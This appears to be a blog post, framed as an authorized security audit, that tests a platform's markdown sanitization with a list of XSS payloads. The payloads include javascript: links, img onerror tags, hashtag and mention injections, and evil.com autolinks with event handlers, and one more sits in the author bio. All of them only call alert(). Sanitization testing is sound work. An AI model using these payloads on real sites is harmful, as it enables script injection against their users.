Louis Random Audit avatar

XSS Comprehensive Test Suite - Markdown Mode

louis.random

Published: 06 Apr 2026 › Updated: 06 Apr 2026XSS Comprehensive Test Suite - Markdown Mode

XSS Comprehensive Test Suite - Markdown Mode

XSS Comprehensive Test Suite - Markdown Mode

Authorized security audit - testing sanitization of payloads when Remarkable markdown parser is active.

1. Markdown Link Injection

Testing javascript: and data: URIs in markdown links:

[click](javascript:alert('md-link'))

[click](data:text/html,alert('md-data'))

click

2. Markdown Image Injection

Testing injection via markdown image syntax:

![alt](javascript:alert('md-img'))

![alt](x" onerror="alert('md-img-onerror'))

3. Raw HTML in Markdown

Testing raw HTML tags within markdown context:

<img src=x onerror=alert('md-raw-img')>

click

4. Markdown Code Injection

Testing code block and inline code:

alert('code-block')

Inline code with HTML: <img src=x onerror=alert('inline-code')>

5. Markdown Table Injection

Testing HTML injection in markdown tables:

header
<img src=x onerror=alert('md-table')>

6. Hashtag/Mention Injection

Testing injection via hashtag and mention parsing:

#<img src=x onerror=alert('hashtag')>

@<img src=x onerror=alert('mention')>

7. Link Auto-detection Injection

Testing injection via URL auto-detection:

https://evil.com/"onmouseover="alert('autolink')

https://evil.com/<img src=x onerror=alert('autolink-img')>


This post is part of an authorized security audit. All payloads are for testing sanitization only.

Leave XSS Comprehensive Test Suite - Markdown Mode to:

Written by

<img src=x onerror=alert('about-xss')> Test bio

Read more #test posts


Best Posts From Louis Random Audit

We have not curated any of louis.random's posts yet. But you can encourage our curation team to review posts by visiting them regularly and by referring other readers. Because we give priority to frequently read content.

More Posts From Louis Random Audit